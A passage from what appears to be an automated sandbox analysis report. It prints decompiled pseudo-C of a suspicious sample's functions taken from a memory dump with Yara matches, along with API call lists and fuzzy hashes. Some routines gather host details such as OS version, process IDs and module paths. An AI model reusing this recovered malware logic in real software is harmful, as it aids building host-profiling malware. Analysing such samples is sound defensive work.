                                                                                                                                                                                                					E00AF85FB( &_v12, 0); // executed
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}

























                                                                                                                                                                                                0x00affacb
                                                                                                                                                                                                0x00affade
                                                                                                                                                                                                0x00affae3
                                                                                                                                                                                                0x00affae6
                                                                                                                                                                                                0x00affae6
                                                                                                                                                                                                0x00affaee
                                                                                                                                                                                                0x00affaf9
                                                                                                                                                                                                0x00affafe
                                                                                                                                                                                                0x00affb01
                                                                                                                                                                                                0x00affb01
                                                                                                                                                                                                0x00affb04
                                                                                                                                                                                                0x00affb06
                                                                                                                                                                                                0x00affb0c
                                                                                                                                                                                                0x00affb17
                                                                                                                                                                                                0x00affb1c
                                                                                                                                                                                                0x00affb21
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00affb2a
                                                                                                                                                                                                0x00affb30
                                                                                                                                                                                                0x00affb37
                                                                                                                                                                                                0x00affb39
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00affb39
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00affb37
                                                                                                                                                                                                0x00affb43
                                                                                                                                                                                                0x00affb4c
                                                                                                                                                                                                0x00affb50

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,00AFF8F7,?,?,?,00AFFCF1,00000000), ref: 00AFFB2A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeapSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4201116106-0
                                                                                                                                                                                                • Opcode ID: b58cca6b5362106df53669fbcb4b0e1f5560e87606919650e87e3da37c9f1c2f
                                                                                                                                                                                                • Instruction ID: 5523a64041df63d9c44f4c34a63b5b15505c492222a2c51e01ef6e0c05a58844
                                                                                                                                                                                                • Opcode Fuzzy Hash: b58cca6b5362106df53669fbcb4b0e1f5560e87606919650e87e3da37c9f1c2f
                                                                                                                                                                                                • Instruction Fuzzy Hash: DD318B72A00208AFDB00EBE8DE86EBEB3B9EF54304F104579B615E7241EE35DA418750
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                                                                			E00AF8950(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				WCHAR* _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				WCHAR* _v20;
                                                                                                                                                                                                				short _t30;
                                                                                                                                                                                                				short _t33;
                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                				short _t49;
                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                				char _t71;
                                                                                                                                                                                                				WCHAR* _t72;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                				_t71 = 0;
                                                                                                                                                                                                				_v12 = __ecx;
                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_t72 = E00AF85E5(0x448);
                                                                                                                                                                                                				_v20 = _t72;
                                                                                                                                                                                                				_pop(_t52);
                                                                                                                                                                                                				if(_t72 != 0) {
                                                                                                                                                                                                					_t72[0x21a] = __edx;
                                                                                                                                                                                                					_t72[0x21c] = _a8;
                                                                                                                                                                                                					lstrcpynW(_t72, _v12, 0x200);
                                                                                                                                                                                                					if(_t49 != 1) {
                                                                                                                                                                                                						_t30 = E00AF85E5(0x100000);
                                                                                                                                                                                                						_t72[0x212] = _t30;
                                                                                                                                                                                                						if(_t30 != 0) {
                                                                                                                                                                                                							_t69 = _a4;
                                                                                                                                                                                                							_t72[0x216] = 0x100000;
                                                                                                                                                                                                							if(_a4 != 0) {
                                                                                                                                                                                                								E00AF87CB(_t72, _t69);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							L16:
                                                                                                                                                                                                							return _t72;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						L7:
                                                                                                                                                                                                						if(_t71 != 0) {
                                                                                                                                                                                                							E00AF85FB( &_v8, 0);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_t33 = _t72[0x218];
                                                                                                                                                                                                						if(_t33 != 0) {
                                                                                                                                                                                                							_t38 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t73 =  &(_t72[0x212]);
                                                                                                                                                                                                						if(_t72[0x212] != 0) {
                                                                                                                                                                                                							E00AF85FB(_t73, 0);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E00AF85FB( &_v20, 0);
                                                                                                                                                                                                						goto L1;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t43 = E00AFA6EB(_t52, _v12,  &_v16); // executed
                                                                                                                                                                                                					_t71 = _t43;
                                                                                                                                                                                                					_v8 = _t71;
                                                                                                                                                                                                					if(_t71 == 0) {
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(E00AF87F6(_t72, _t71, _v16, _a4) < 0) {
                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t45 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                                                                                                                                                                                                						_t72[0x218] = _t72[0x218] & 0x00000000;
                                                                                                                                                                                                						E00AF85FB( &_v8, 0);
                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				L1:
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}
















                                                                                                                                                                                                0x00af8a24
                                                                                                                                                                                                0x00af8a27
                                                                                                                                                                                                0x00af8a2c
                                                                                                                                                                                                0x00af8a2c
                                                                                                                                                                                                0x00af8a2f
                                                                                                                                                                                                0x00af8a38
                                                                                                                                                                                                0x00af8a3d
                                                                                                                                                                                                0x00af8a43
                                                                                                                                                                                                0x00af8a4a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af8a50
                                                                                                                                                                                                0x00af89ac
                                                                                                                                                                                                0x00af89b1
                                                                                                                                                                                                0x00af89b3
                                                                                                                                                                                                0x00af89ba
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af89cf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af89d1
                                                                                                                                                                                                0x00af89d1
                                                                                                                                                                                                0x00af89dc
                                                                                                                                                                                                0x00af89df
                                                                                                                                                                                                0x00af89ec
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af89f2
                                                                                                                                                                                                0x00af89cf
                                                                                                                                                                                                0x00af897b
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 00AF899A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeaplstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 680773602-0
                                                                                                                                                                                                • Opcode ID: d6bcd826cf22882dd0057115f6cb4ed38edd907e76f58f6159eeb9a57f6bcedd
                                                                                                                                                                                                • Instruction ID: 93ea776ac11a4cc509672d6d25584c5fa00a3c9625da1172f516d0d3e43bb235
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6bcd826cf22882dd0057115f6cb4ed38edd907e76f58f6159eeb9a57f6bcedd
                                                                                                                                                                                                • Instruction Fuzzy Hash: A331C672A00709AFDB10ABE8DD41BBEB7B8EF40760F21441AF755D7181DF78AA018B58
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                			E00AFE308(void* __fp0, intOrPtr _a4) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				char _v544;
                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                				signed int _t73;
                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t77 = __fp0;
                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                				_t66 =  *0xb0e6b4; // 0x4d3f870, executed
                                                                                                                                                                                                				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                                                                                                                                                                                                				if(_t40 == 0) {
                                                                                                                                                                                                					_t73 = 0;
                                                                                                                                                                                                					if(_v20 <= 0) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_t41 =  *0xb0e6b4; // 0x4d3f870
                                                                                                                                                                                                						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_v16 = 0;
                                                                                                                                                                                                						_v12 = 0;
                                                                                                                                                                                                						_t48 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                                                                                                                                                                                                						_t70 = E00AF85E5(_v16 + 1);
                                                                                                                                                                                                						if(_t70 != 0) {
                                                                                                                                                                                                							_v12 = 0x200;
                                                                                                                                                                                                							_push( &_v32);
                                                                                                                                                                                                							_push( &_v12);
                                                                                                                                                                                                							_push( &_v544);
                                                                                                                                                                                                							_push( &_v16);
                                                                                                                                                                                                							_push(_t70);
                                                                                                                                                                                                							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                                                                                                                                                                                                							_t58 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                                                                                                                                                                                                								E00AF48F8(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                                                                                                                                                                                                								_t75 = _t75 + 0xc;
                                                                                                                                                                                                								Sleep(0xa);
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t73 = _t73 + 1;
                                                                                                                                                                                                					} while (_t73 < _v20);
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t40 | 0xffffffff;
                                                                                                                                                                                                			}






















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(0000000A), ref: 00AFE3D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                • Opcode ID: cdf2f33adf88ec46a76529389069fc604af83949685b253bf73a849484e11a84
                                                                                                                                                                                                • Instruction ID: bc21ad1ceca979c880f52c8c53660f7bf371931be5801b1d39fc9bae5ef763af
                                                                                                                                                                                                • Opcode Fuzzy Hash: cdf2f33adf88ec46a76529389069fc604af83949685b253bf73a849484e11a84
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8531E7B590020DAFDB11DFD4DD88DEEBBBCEB18350F1146A6B621E7251DB30DA058B61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA3D8(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                				char _t25;
                                                                                                                                                                                                				signed int _t30;
                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t54 = __fp0;
                                                                                                                                                                                                				_t45 = __edx;
                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                				_t30 = __ecx;
                                                                                                                                                                                                				if( *__edx > 0) {
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_t24 = E00AF9E9B(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                                                                                                                                                                                                						if(_t24 == 0) {
                                                                                                                                                                                                							_t25 = E00AF972A( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                                                                                                                                                                                                							_v8 = _t25;
                                                                                                                                                                                                							if(_t25 != 0) {
                                                                                                                                                                                                								L6:
                                                                                                                                                                                                								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                								_v20 = _t25;
                                                                                                                                                                                                								E00AFA076(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                                                                                                                                                                                                								_t47 = _t47 + 0xc;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								if(GetLastError() != 0xd) {
                                                                                                                                                                                                									_t25 = _v8;
                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									E00AF9F13( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t46 = _t46 + 1;
                                                                                                                                                                                                					} while (_t46 <  *_t45);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}














                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF972A: SetLastError.KERNEL32(0000000D,00000000,00000000,00AFA32C,00000000,00000000,?,?,?,00AF5AD4), ref: 00AF9763
                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00AF4C53,?,?,00000000), ref: 00AFA40F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                • Opcode ID: c9434b93cafd57101f59311598eb3a1a6d4ccf75b317b5b67afcb55ca859e1a0
                                                                                                                                                                                                • Instruction ID: 1c9d289fbf98ac98fad55a837ee6dc9e75c6a2e89c2bf945830e9be173d8ea1a
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9434b93cafd57101f59311598eb3a1a6d4ccf75b317b5b67afcb55ca859e1a0
                                                                                                                                                                                                • Instruction Fuzzy Hash: A911A5B9600109AFCB10DF98C5856BEF3A5BB94305F208128E51A97241DB70ED058BD1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                			E00AF5D5E(void* __eflags) {
                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                				WCHAR* _t12;
                                                                                                                                                                                                				WCHAR* _t13;
                                                                                                                                                                                                				WCHAR* _t14;
                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                				WCHAR* _t28;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t7 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				E00AFA8AF( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                                                                                                                                                                                                				_t10 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				_t28 = 2;
                                                                                                                                                                                                				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                					_t22 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_t12 = E00AF5967( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                                                                                                                                                                                                					 *0xb0e6ac = _t12;
                                                                                                                                                                                                					__eflags = _t12;
                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                						_t14 = E00AF9E86();
                                                                                                                                                                                                						__eflags = _t14;
                                                                                                                                                                                                						if(_t14 == 0) {
                                                                                                                                                                                                							_t28 = 0;
                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t15 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                							lstrcmpiW(_t15 + 0x228, _t14);
                                                                                                                                                                                                							asm("sbb esi, esi");
                                                                                                                                                                                                							_t28 = _t28 + 1;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t13 = _t28;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t19 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                                                                                                                                                                                                					_t13 = 3;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                			}
















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00B1FDD8,00000000), ref: 00AF5DD3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcmpi
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1586166983-0
                                                                                                                                                                                                • Opcode ID: 0f461fb5be3f5d5b2be5733335955026b22da5fddca83e634f2b0b3be89b11b8
                                                                                                                                                                                                • Instruction ID: d0ad9d850637f07077ba7c77fb924c11467b357392bb6f02fa08b8eaec6d411b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f461fb5be3f5d5b2be5733335955026b22da5fddca83e634f2b0b3be89b11b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: D401F771B011159FE700E7FAED49FA677ACAF28740F454520F301D7191DE20D800CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF5CCD(void* __ecx, void* __eflags, void* __fp0) {
                                                                                                                                                                                                				void _v44;
                                                                                                                                                                                                				signed int _t8;
                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t35 = __eflags;
                                                                                                                                                                                                				_t24 = __ecx;
                                                                                                                                                                                                				_t8 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				E00B024D3(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                                                                                                                                                                                                				E00AF85D0();
                                                                                                                                                                                                				E00AF8F59();
                                                                                                                                                                                                				 *0xb0e780 = 0;
                                                                                                                                                                                                				 *0xb0e784 = 0;
                                                                                                                                                                                                				 *0xb0e77c = 0;
                                                                                                                                                                                                				E00AF5E97(); // executed
                                                                                                                                                                                                				E00AFCFC6(_t24);
                                                                                                                                                                                                				_t14 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                                                                                                                                                                                                				_t15 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				E00AFA8AF( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
                                                                                                                                                                                                				E00AFB379( &_v44);
                                                                                                                                                                                                				memset( &_v44, 0, 0x27);
                                                                                                                                                                                                				E00AF5C07( &_v44, __fp0);
                                                                                                                                                                                                				_t21 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}












                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00AF5F88), ref: 00AF85D9
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetCurrentProcess.KERNEL32(?,?,00B20000,?,00AF3538), ref: 00AFCFD2
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetModuleFileNameW.KERNEL32(00000000,00B21644,00000105,?,?,00B20000,?,00AF3538), ref: 00AFCFF3
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: memset.MSVCRT ref: 00AFD024
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetVersionExA.KERNEL32(00B20000,00B20000,?,00AF3538), ref: 00AFD02F
                                                                                                                                                                                                  • Part of subcall function 00AFCFC6: GetCurrentProcessId.KERNEL32(?,00AF3538), ref: 00AFD035
                                                                                                                                                                                                  • Part of subcall function 00AFB379: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00AF3C7D,?,?,?,?,?,?,?,?,00AF3D62,00000000), ref: 00AFB3AC
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF5D40
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcessmemset$ChangeCloseCreateFileFindHeapModuleNameNotificationVersion
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2687588655-0
                                                                                                                                                                                                • Opcode ID: 85f859c67f83ddfc3b6d1d012678fc1ecf01358ff3483f9a35f88ec663e63fd6
                                                                                                                                                                                                • Instruction ID: 01be288bc0ba095e0b09faaf9598859817a8a6cabd5d8acb6e246408fcb3bfc0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 85f859c67f83ddfc3b6d1d012678fc1ecf01358ff3483f9a35f88ec663e63fd6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D016D715012199FE604FBE8EE4AEA93BE4EF28310F450561F614A7222EF709945CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E00AFD061(void* __fp0) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xb0e69c; // 0x10000000
				_t81 = E00AF85E5(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xb0e684; // 0x4d3f6c8
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00B02339( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00AF8F9F(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E00AFBA47();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E00AFBBCF( *_t88) == 0) {
					_t90 = E00AFBAA4(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E00AFE433(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E00AFE3F8(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xb0e68c; // 0x4d3f890
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xb0e694; // 0x4d3f820
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00AF8F9F(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E00AFB7EA(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E00AFB6BF(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00AF8FB9(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E00AFD442(_t43, E00AFC3BB(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E00AFB8CC(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E00AFBC21(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xb0e684; // 0x4d3f6c8
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
